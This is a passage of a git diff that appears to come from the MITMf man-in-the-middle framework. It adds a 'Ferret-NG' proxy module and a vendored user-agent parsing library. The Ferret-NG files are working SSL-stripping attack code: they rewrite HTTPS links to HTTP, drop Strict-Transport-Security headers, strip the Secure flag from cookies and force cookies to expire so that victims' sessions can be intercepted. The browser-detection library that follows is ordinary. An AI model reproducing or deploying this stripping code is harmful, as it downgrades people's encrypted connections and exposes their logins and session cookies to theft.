+ expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
+ ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
+
+ expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
+ ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
+
+ if len(pathList) > 2:
+ expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
+ domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
+
+ expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
+ host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
+
+ return expireStrings
+
+
diff --git a/core/ferretng/DnsCache.py b/core/ferretng/DnsCache.py
new file mode 100644
index 0000000..f0cc638
--- /dev/null
+++ b/core/ferretng/DnsCache.py
@@ -0,0 +1,49 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class DnsCache:
+
+ '''
+ The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
+ '''
+
+ _instance = None
+
+ def __init__(self):
+ self.customAddress = None
+ self.cache = {}
+
+ @staticmethod
+ def getInstance():
+ if DnsCache._instance == None:
+ DnsCache._instance = DnsCache()
+
+ return DnsCache._instance
+
+ def cacheResolution(self, host, address):
+ self.cache[host] = address
+
+ def getCachedAddress(self, host):
+ if host in self.cache:
+ return self.cache[host]
+
+ return None
diff --git a/core/ferretng/FerretProxy.py b/core/ferretng/FerretProxy.py
new file mode 100644
index 0000000..d95f786
--- /dev/null
+++ b/core/ferretng/FerretProxy.py
@@ -0,0 +1,24 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+from twisted.web.http import HTTPChannel
+from ClientRequest import ClientRequest
+
+class FerretProxy(HTTPChannel):
+
+ requestFactory = ClientRequest
diff --git a/core/ferretng/SSLServerConnection.py b/core/ferretng/SSLServerConnection.py
new file mode 100644
index 0000000..82dc8d1
--- /dev/null
+++ b/core/ferretng/SSLServerConnection.py
@@ -0,0 +1,95 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging, re, string
+
+from ServerConnection import ServerConnection
+from URLMonitor import URLMonitor
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class SSLServerConnection(ServerConnection):
+
+ '''
+ For SSL connections to a server, we need to do some additional stripping. First we need
+ to make note of any relative links, as the server will be expecting those to be requested
+ via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
+ '''
+
+ cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
+ cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
+ iconExpression = re.compile(r"", re.IGNORECASE)
+ linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
+ headExpression = re.compile(r"", re.IGNORECASE)
+
+ def __init__(self, command, uri, postData, headers, client):
+ ServerConnection.__init__(self, command, uri, postData, headers, client)
+ self.urlMonitor = URLMonitor.getInstance()
+
+ def getLogLevel(self):
+ return logging.INFO
+
+ def getPostPrefix(self):
+ return "SECURE POST"
+
+ def handleHeader(self, key, value):
+ if (key.lower() == 'set-cookie'):
+ value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
+
+ ServerConnection.handleHeader(self, key, value)
+
+ def stripFileFromPath(self, path):
+ (strippedPath, lastSlash, file) = path.rpartition('/')
+ return strippedPath
+
+ def buildAbsoluteLink(self, link):
+ absoluteLink = ""
+
+ if ((not link.startswith('http')) and (not link.startswith('/'))):
+ absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
+
+ mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found path-relative link in secure transmission: " + link)
+ mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
+ elif not link.startswith('http'):
+ absoluteLink = "http://"+self.headers['host']+link
+
+ mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found relative link in secure transmission: " + link)
+ mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute link: " + absoluteLink)
+
+ if not absoluteLink == "":
+            absoluteLink = absoluteLink.replace('&amp;', '&')
+ self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
+
+ def replaceCssLinks(self, data):
+ iterator = re.finditer(SSLServerConnection.cssExpression, data)
+
+ for match in iterator:
+ self.buildAbsoluteLink(match.group(1))
+
+ return data
+
+ def replaceSecureLinks(self, data):
+ data = ServerConnection.replaceSecureLinks(self, data)
+ data = self.replaceCssLinks(data)
+
+ iterator = re.finditer(SSLServerConnection.linkExpression, data)
+
+ for match in iterator:
+ self.buildAbsoluteLink(match.group(10))
+
+ return data
diff --git a/core/ferretng/ServerConnection.py b/core/ferretng/ServerConnection.py
new file mode 100644
index 0000000..e1e04ef
--- /dev/null
+++ b/core/ferretng/ServerConnection.py
@@ -0,0 +1,193 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+import re
+import string
+import random
+import zlib
+import gzip
+import StringIO
+import sys
+
+from twisted.web.http import HTTPClient
+from URLMonitor import URLMonitor
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ServerConnection(HTTPClient):
+
+ ''' The server connection is where we do the bulk of the stripping. Everything that
+ comes back is examined. The headers we dont like are removed, and the links are stripped
+ from HTTPS to HTTP.
+ '''
+
+ urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
+ urlType = re.compile(r"https://", re.IGNORECASE)
+ urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
+ urlTypewww = re.compile(r"https://www", re.IGNORECASE)
+ urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
+ urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
+ urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
+ #urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
+
+ def __init__(self, command, uri, postData, headers, client):
+
+ self.command = command
+ self.uri = uri
+ self.postData = postData
+ self.headers = headers
+ self.client = client
+ self.clientInfo = None
+ self.urlMonitor = URLMonitor.getInstance()
+ self.isImageRequest = False
+ self.isCompressed = False
+ self.contentLength = None
+ self.shutdownComplete = False
+
+ def getPostPrefix(self):
+ return "POST"
+
+ def sendRequest(self):
+ if self.command == 'GET':
+
+ mitmf_logger.debug(self.client.getClientIP() + " [Ferret-NG] Sending Request: {}".format(self.headers['host']))
+
+ self.sendCommand(self.command, self.uri)
+
+ def sendHeaders(self):
+ for header, value in self.headers.iteritems():
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Sending header: ({}: {})".format(header, value))
+ self.sendHeader(header, value)
+
+ self.endHeaders()
+
+ def sendPostData(self):
+
+ self.transport.write(self.postData)
+
+ def connectionMade(self):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] HTTP connection made.")
+ self.sendRequest()
+ self.sendHeaders()
+
+ if (self.command == 'POST'):
+ self.sendPostData()
+
+ def handleStatus(self, version, code, message):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Server response: {} {} {}".format(version, code, message))
+ self.client.setResponseCode(int(code), message)
+
+ def handleHeader(self, key, value):
+ if (key.lower() == 'location'):
+ value = self.replaceSecureLinks(value)
+
+ if (key.lower() == 'content-type'):
+ if (value.find('image') != -1):
+ self.isImageRequest = True
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is image content, not scanning")
+
+ if (key.lower() == 'content-encoding'):
+ if (value.find('gzip') != -1):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is compressed")
+ self.isCompressed = True
+
+ elif (key.lower()== 'strict-transport-security'):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Zapped a strict-trasport-security header")
+
+ elif (key.lower() == 'content-length'):
+ self.contentLength = value
+
+ elif (key.lower() == 'set-cookie'):
+ self.client.responseHeaders.addRawHeader(key, value)
+
+ else:
+ self.client.setHeader(key, value)
+
+ def handleEndHeaders(self):
+ if (self.isImageRequest and self.contentLength != None):
+ self.client.setHeader("Content-Length", self.contentLength)
+
+ if self.length == 0:
+ self.shutdown()
+
+ if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
+ for header, value in self.client.headers.iteritems():
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Receiving header: ({}: {})".format(header, value))
+
+ def handleResponsePart(self, data):
+ if (self.isImageRequest):
+ self.client.write(data)
+ else:
+ HTTPClient.handleResponsePart(self, data)
+
+ def handleResponseEnd(self):
+ if (self.isImageRequest):
+ self.shutdown()
+ else:
+ try:
+ HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
+ except:
+ pass
+
+ def handleResponse(self, data):
+ if (self.isCompressed):
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Decompressing content...")
+ data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
+
+ data = self.replaceSecureLinks(data)
+
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Read from server {} bytes of data".format(len(data)))
+
+ if (self.contentLength != None):
+ self.client.setHeader('Content-Length', len(data))
+
+ try:
+ self.client.write(data)
+ except:
+ pass
+
+ try:
+ self.shutdown()
+ except:
+ mitmf_logger.info("[Ferret-NG] [ServerConnection] Client connection dropped before request finished.")
+
+ def replaceSecureLinks(self, data):
+
+ iterator = re.finditer(ServerConnection.urlExpression, data)
+
+ for match in iterator:
+ url = match.group()
+
+ mitmf_logger.debug("[Ferret-NG] [ServerConnection] Found secure reference: " + url)
+
+ url = url.replace('https://', 'http://', 1)
+                url = url.replace('&amp;', '&')
+ self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
+
+ data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
+ return re.sub(ServerConnection.urlType, 'http://', data)
+
+ def shutdown(self):
+ if not self.shutdownComplete:
+ self.shutdownComplete = True
+ try:
+ self.client.finish()
+ self.transport.loseConnection()
+ except:
+ pass
diff --git a/core/ferretng/ServerConnectionFactory.py b/core/ferretng/ServerConnectionFactory.py
new file mode 100644
index 0000000..a64c800
--- /dev/null
+++ b/core/ferretng/ServerConnectionFactory.py
@@ -0,0 +1,48 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+from twisted.internet.protocol import ClientFactory
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ServerConnectionFactory(ClientFactory):
+
+ def __init__(self, command, uri, postData, headers, client):
+ self.command = command
+ self.uri = uri
+ self.postData = postData
+ self.headers = headers
+ self.client = client
+
+ def buildProtocol(self, addr):
+ return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
+
+ def clientConnectionFailed(self, connector, reason):
+ mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
+
+ destination = connector.getDestination()
+
+ if (destination.port != 443):
+ mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
+ self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
+ else:
+ try:
+ self.client.finish()
+ except:
+ pass
diff --git a/core/ferretng/URLMonitor.py b/core/ferretng/URLMonitor.py
new file mode 100644
index 0000000..85386f9
--- /dev/null
+++ b/core/ferretng/URLMonitor.py
@@ -0,0 +1,86 @@
+# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import re
+import os
+import logging
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class URLMonitor:
+
+ '''
+ The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
+ server is expecting over SSL. It also keeps track of secure favicon urls.
+ '''
+
+ # Start the arms race, and end up here...
+ javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
+ cookies = dict()
+ hijack_client = ''
+ _instance = None
+
+ def __init__(self):
+ self.strippedURLs = set()
+ self.strippedURLPorts = dict()
+
+ @staticmethod
+ def getInstance():
+ if URLMonitor._instance == None:
+ URLMonitor._instance = URLMonitor()
+
+ return URLMonitor._instance
+
+ def isSecureLink(self, client, url):
+ for expression in URLMonitor.javascriptTrickery:
+ if (re.match(expression, url)):
+ return True
+
+ return (client,url) in self.strippedURLs
+
+ def getSecurePort(self, client, url):
+ if (client,url) in self.strippedURLs:
+ return self.strippedURLPorts[(client,url)]
+ else:
+ return 443
+
+ def addSecureLink(self, client, url):
+ methodIndex = url.find("//") + 2
+ method = url[0:methodIndex]
+
+ pathIndex = url.find("/", methodIndex)
+        if pathIndex == -1:
+ pathIndex = len(url)
+ url += "/"
+
+ host = url[methodIndex:pathIndex].lower()
+ path = url[pathIndex:]
+
+ port = 443
+ portIndex = host.find(":")
+
+ if (portIndex != -1):
+            port = host[portIndex+1:]
+            host = host[0:portIndex]
+ if len(port) == 0:
+ port = 443
+
+ url = method + host + path
+
+ self.strippedURLs.add((client, url))
+ self.strippedURLPorts[(client, url)] = int(port)
diff --git a/core/wrappers/__init__.py b/core/ferretng/__init__.py
similarity index 100%
rename from core/wrappers/__init__.py
rename to core/ferretng/__init__.py
diff --git a/core/httpagentparser.py b/core/httpagentparser.py
new file mode 100644
index 0000000..0c739ac
--- /dev/null
+++ b/core/httpagentparser.py
@@ -0,0 +1,673 @@
+#
+#httpagentparser library, stolen from https://github.com/shon/httpagentparser
+#
+
+"""
+Extract client information from http user agent
+The module does not try to detect all capabilities of browser in current form (it can easily be extended though).
+Tries to
+ * be fast
+ * very easy to extend
+ * reliable enough for practical purposes
+ * assist python web apps to detect clients.
+"""
+
+__version__ = '1.7.7'
+
+
+class DetectorsHub(dict):
+ _known_types = ['os', 'dist', 'flavor', 'browser']
+
+ def __init__(self, *args, **kw):
+ dict.__init__(self, *args, **kw)
+ for typ in self._known_types:
+ self.setdefault(typ, [])
+ self.registerDetectors()
+
+ def register(self, detector):
+ if detector.info_type not in self._known_types:
+ self[detector.info_type] = [detector]
+ self._known_types.insert(detector.order, detector.info_type)
+ else:
+ self[detector.info_type].append(detector)
+
+ def __iter__(self):
+ return iter(self._known_types)
+
+ def registerDetectors(self):
+ detectors = [v() for v in globals().values() if DetectorBase in getattr(v, '__mro__', [])]
+ for d in detectors:
+ if d.can_register:
+ self.register(d)
+
+
+class DetectorBase(object):
+ name = "" # "to perform match in DetectorsHub object"
+ info_type = "override me"
+ result_key = "override me"
+ order = 10 # 0 is highest
+ look_for = "string to look for"
+    skip_if_found = []  # strings which, if present, stop processing
+ can_register = False
+ version_markers = [("/", " ")]
+ allow_space_in_version = False
+ _suggested_detectors = None
+ platform = None
+ bot = False
+
+ def __init__(self):
+ if not self.name:
+ self.name = self.__class__.__name__
+ self.can_register = (self.__class__.__dict__.get('can_register', True))
+
+ def detect(self, agent, result):
+ # -> True/None
+ word = self.checkWords(agent)
+ if word:
+ result[self.info_type] = dict(name=self.name)
+ result['bot'] = self.bot
+ version = self.getVersion(agent, word)
+ if version:
+ result[self.info_type]['version'] = version
+ if self.platform:
+ result['platform'] = {'name': self.platform, 'version': version}
+ return True
+
+ def checkWords(self, agent):
+ # -> True/None
+ for w in self.skip_if_found:
+ if w in agent:
+ return False
+ if isinstance(self.look_for, (tuple, list)):
+ for word in self.look_for:
+ if word in agent:
+ return word
+ elif self.look_for in agent:
+ return self.look_for
+
+ def getVersion(self, agent, word):
+ """
+ => version string /None
+ """
+ version_markers = self.version_markers if \
+ isinstance(self.version_markers[0], (list, tuple)) else [self.version_markers]
+ version_part = agent.split(word, 1)[-1]
+ for start, end in version_markers:
+ if version_part.startswith(start) and end in version_part:
+ version = version_part[1:]
+ if end: # end could be empty string
+ version = version.split(end)[0]
+ if not self.allow_space_in_version:
+ version = version.split()[0]
+ return version
+
+
+class OS(DetectorBase):
+ info_type = "os"
+ can_register = False
+ version_markers = [";", " "]
+ allow_space_in_version = True
+ platform = None
+
+
+class Dist(DetectorBase):
+ info_type = "dist"
+ can_register = False
+ platform = None
+
+
+class Flavor(DetectorBase):
+ info_type = "flavor"
+ can_register = False
+ platform = None
+
+
+class Browser(DetectorBase):
+ info_type = "browser"
+ can_register = False
+
+
+class Firefox(Browser):
+ look_for = "Firefox"
+ version_markers = [('/', '')]
+ skip_if_found = ["SeaMonkey", "web/snippet"]
+
+
+class SeaMonkey(Browser):
+ look_for = "SeaMonkey"
+ version_markers = [('/', '')]
+
+
+class Konqueror(Browser):
+ look_for = "Konqueror"
+ version_markers = ["/", ";"]
+
+
+class OperaMobile(Browser):
+ look_for = "Opera Mobi"
+ name = "Opera Mobile"
+
+ def getVersion(self, agent, word):
+ try:
+ look_for = "Version"
+ return agent.split(look_for)[1][1:].split(' ')[0]
+ except IndexError:
+ look_for = "Opera"
+ return agent.split(look_for)[1][1:].split(' ')[0]
+
+
+class Opera(Browser):
+ look_for = "Opera"
+
+ def getVersion(self, agent, word):
+ try:
+ look_for = "Version"
+ return agent.split(look_for)[1][1:].split(' ')[0]
+ except IndexError:
+ look_for = "Opera"
+ version = agent.split(look_for)[1][1:].split(' ')[0]
+ return version.split('(')[0]
+
+
+class OperaNew(Browser):
+ """
+ Opera after version 15
+ """
+ name = "Opera"
+ look_for = "OPR"
+ version_markers = [('/', '')]
+
+
+class Netscape(Browser):
+ look_for = "Netscape"
+ version_markers = [("/", '')]
+
+
+class Trident(Browser):
+ look_for = "Trident"
+ skip_if_found = ["MSIE", "Opera"]
+ name = "IE"
+ version_markers = ["/", ";"]
+ trident_to_ie_versions = {
+ '4.0': '8.0',
+ '5.0': '9.0',
+ '6.0': '10.0',
+ '7.0': '11.0',
+ }
+
+ def getVersion(self, agent, word):
+ return self.trident_to_ie_versions.get(super(Trident, self).getVersion(agent, word))
+
+
+class MSIE(Browser):
+ look_for = "MSIE"
+ skip_if_found = ["Opera"]
+ name = "IE"
+ version_markers = [" ", ";"]
+
+
+class Galeon(Browser):
+ look_for = "Galeon"
+
+
+class WOSBrowser(Browser):
+ look_for = "wOSBrowser"
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class Safari(Browser):
+ look_for = "Safari"
+
+ def checkWords(self, agent):
+ unless_list = ["Chrome", "OmniWeb", "wOSBrowser", "Android"]
+ if self.look_for in agent:
+ for word in unless_list:
+ if word in agent:
+ return False
+ return self.look_for
+
+ def getVersion(self, agent, word):
+ if "Version/" in agent:
+ return agent.split('Version/')[-1].split(' ')[0].strip()
+ if "Safari/" in agent:
+ return agent.split('Safari/')[-1].split(' ')[0].strip()
+ else:
+ return agent.split('Safari ')[-1].split(' ')[0].strip() # Mobile Safari
+
+class GoogleBot(Browser):
+ # https://support.google.com/webmasters/answer/1061943
+ look_for = ["Googlebot", "Googlebot-News", "Googlebot-Image",
+ "Googlebot-Video", "Googlebot-Mobile", "Mediapartners-Google",
+ "Mediapartners", "AdsBot-Google", "web/snippet"]
+ bot = True
+ version_markers = [('/', ';'), ('/', ' ')]
+
+class GoogleFeedFetcher(Browser):
+ look_for = "Feedfetcher-Google"
+ bot = True
+
+ def get_version(self, agent):
+ pass
+
+class RunscopeRadar(Browser):
+ look_for = "runscope-radar"
+ bot = True
+
+class GoogleAppEngine(Browser):
+ look_for = "AppEngine-Google"
+ bot = True
+
+ def get_version(self, agent):
+ pass
+
+class GoogleApps(Browser):
+ look_for = "GoogleApps script"
+ bot = True
+
+ def get_version(self, agent):
+ pass
+
+class TwitterBot(Browser):
+ look_for = "Twitterbot"
+ bot = True
+
+class MJ12Bot(Browser):
+ look_for = "MJ12bot"
+ bot = True
+
+class YandexBot(Browser):
+ # http://help.yandex.com/search/robots/agent.xml
+ look_for = "Yandex"
+ bot = True
+
+ def getVersion(self, agent, word):
+ return agent[agent.index('Yandex'):].split('/')[-1].split(')')[0].strip()
+
+class BingBot(Browser):
+ look_for = "bingbot"
+ version_markers = ["/", ";"]
+ bot = True
+
+
+class BaiduBot(Browser):
+ # http://help.baidu.com/question?prod_en=master&class=1&id=1000973
+ look_for = ["Baiduspider", "Baiduspider-image", "Baiduspider-video",
+ "Baiduspider-news", "Baiduspider-favo", "Baiduspider-cpro",
+ "Baiduspider-ads"]
+ bot = True
+ version_markers = ('/', ';')
+
+
+class LinkedInBot(Browser):
+ look_for = "LinkedInBot"
+ bot = True
+
+class ArchiveDotOrgBot(Browser):
+ look_for = "archive.org_bot"
+ bot = True
+
+class YoudaoBot(Browser):
+ look_for = "YoudaoBot"
+ bot = True
+
+class YoudaoBotImage(Browser):
+ look_for = "YodaoBot-Image"
+ bot = True
+
+class RogerBot(Browser):
+ look_for = "rogerbot"
+ bot = True
+
+class TweetmemeBot(Browser):
+ look_for = "TweetmemeBot"
+ bot = True
+
+class WebshotBot(Browser):
+ look_for = "WebshotBot"
+ bot = True
+
+class SensikaBot(Browser):
+ look_for = "SensikaBot"
+ bot = True
+
+class YesupBot(Browser):
+ look_for = "YesupBot"
+ bot = True
+
+class DotBot(Browser):
+ look_for = "DotBot"
+ bot = True
+
+class PhantomJS(Browser):
+ look_for = "Browser/Phantom"
+ bot = True
+
+class FacebookExternalHit(Browser):
+ look_for = 'facebookexternalhit'
+ bot = True
+
+
+class NokiaOvi(Browser):
+ look_for = "S40OviBrowser"
+
+class UCBrowser(Browser):
+ look_for = "UCBrowser"
+
+class BrowserNG(Browser):
+ look_for = "BrowserNG"
+
+class Dolfin(Browser):
+ look_for = 'Dolfin'
+
+class NetFront(Browser):
+ look_for = 'NetFront'
+
+class Jasmine(Browser):
+ look_for = 'Jasmine'
+
+class Openwave(Browser):
+ look_for = 'Openwave'
+
+class UPBrowser(Browser):
+ look_for = 'UP.Browser'
+
+class OneBrowser(Browser):
+ look_for = 'OneBrowser'
+
+class ObigoInternetBrowser(Browser):
+ look_for = 'ObigoInternetBrowser'
+
+class TelecaBrowser(Browser):
+ look_for = 'TelecaBrowser'
+
+class MAUI(Browser):
+ look_for = 'Browser/MAUI'
+
+ def getVersion(self, agent, word):
+ version = agent.split("Release/")[-1][:10]
+ return version
+
+
+class NintendoBrowser(Browser):
+ look_for = 'NintendoBrowser'
+
+
+class AndroidBrowser(Browser):
+ look_for = "Android"
+ skip_if_found = ['Chrome', 'Windows Phone']
+
+ # http://decadecity.net/blog/2013/11/21/android-browser-versions
+ def getVersion(self, agent, word):
+ pass
+
+
+class Linux(OS):
+ look_for = 'Linux'
+ platform = 'Linux'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class Blackberry(OS):
+ look_for = 'BlackBerry'
+ platform = 'BlackBerry'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class BlackberryPlaybook(Dist):
+ look_for = 'PlayBook'
+ platform = 'BlackBerry'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class WindowsPhone(OS):
+ name = "Windows Phone"
+ platform = 'Windows'
+ look_for = ["Windows Phone OS", "Windows Phone"]
+ version_markers = [(" ", ";"), (" ", ")")]
+
+
+class iOS(OS):
+ look_for = ('iPhone', 'iPad')
+ skip_if_found = ['like iPhone']
+
+
+class iPhone(Dist):
+ look_for = 'iPhone'
+ platform = 'iOS'
+ skip_if_found = ['like iPhone']
+
+ def getVersion(self, agent, word):
+ version_end_chars = [' ']
+ if not "iPhone OS" in agent:
+ return None
+ part = agent.split('iPhone OS')[-1].strip()
+ for c in version_end_chars:
+ if c in part:
+ version = part.split(c)[0]
+ return version.replace('_', '.')
+ return None
+
+
+class IPad(Dist):
+ look_for = 'iPad;'
+ platform = 'iOS'
+
+ def getVersion(self, agent, word):
+ version_end_chars = [' ']
+ if not "CPU OS " in agent:
+ return None
+ part = agent.split('CPU OS ')[-1].strip()
+ for c in version_end_chars:
+ if c in part:
+ version = part.split(c)[0]
+ return version.replace('_', '.')
+ return None
+
+
+class Macintosh(OS):
+ look_for = 'Macintosh'
+
+ def getVersion(self, agent, word):
+ pass
+
+
+class MacOS(Flavor):
+ look_for = 'Mac OS'
+ platform = 'Mac OS'
+ skip_if_found = ['iPhone', 'iPad']
+
+ def getVersion(self, agent, word):
+ version_end_chars = [';', ')']
+ part = agent.split('Mac OS')[-1].strip()
+ for c in version_end_chars:
+ if c in part:
+ version = part.split(c)[0]
+ return version.replace('_', '.')
+ return ''
+
+
+class Windows(Dist):
+ look_for = 'Windows'
+ platform = 'Windows'
+
+
+class Windows(OS):
+ look_for = 'Windows'
+ platform = 'Windows'
+ skip_if_found = ["Windows Phone"]
+ win_versions = {
+ "NT 6.3": "8.1",
+ "NT 6.2": "8",
+ "NT 6.1": "7",
+ "NT 6.0": "Vista",
+ "NT 5.2": "Server 2003 / XP x64",
+ "NT 5.1": "XP",
+ "NT 5.01": "2000 SP1",
+ "NT 5.0": "2000",
+ "98; Win 9x 4.90": "Me"
+ }
+
+ def getVersion(self, agent, word):
+ v = agent.split('Windows')[-1].split(';')[0].strip()
+ if ')' in v:
+ v = v.split(')')[0]
+ v = self.win_versions.get(v, v)
+ return v
+
+
+class Ubuntu(Dist):
+ look_for = 'Ubuntu'
+ version_markers = ["/", " "]
+
+
+class Debian(Dist):
+ look_for = 'Debian'
+ version_markers = ["/", " "]
+
+
+class Chrome(Browser):
+ look_for = "Chrome"
+ version_markers = ["/", " "]
+ skip_if_found = ["OPR"]
+
+ def getVersion(self, agent, word):
+ part = agent.split(word + self.version_markers[0])[-1]
+ version = part.split(self.version_markers[1])[0]
+ if '+' in version:
+ version = part.split('+')[0]
+ return version.strip()
+
+
+class ChromeiOS(Browser):
+ look_for = "CriOS"
+ version_markers = ["/", " "]
+
+
+class ChromeOS(OS):
+ look_for = "CrOS"
+ platform = 'ChromeOS'
+ version_markers = [" ", " "]
+
+ def getVersion(self, agent, word):
+ version_markers = self.version_markers
+ if word + '+' in agent:
+ version_markers = ['+', '+']
+ return agent.split(word + version_markers[0])[-1].split(version_markers[1])[1].strip()[:-1]
+
+
+class Android(Dist):
+ look_for = 'Android'
+ platform = 'Android'
+ skip_if_found = ['Windows Phone']
+
+ def getVersion(self, agent, word):
+ return agent.split(word)[-1].split(';')[0].strip()
+
+
+class WebOS(Dist):
+ look_for = 'hpwOS'
+
+ def getVersion(self, agent, word):
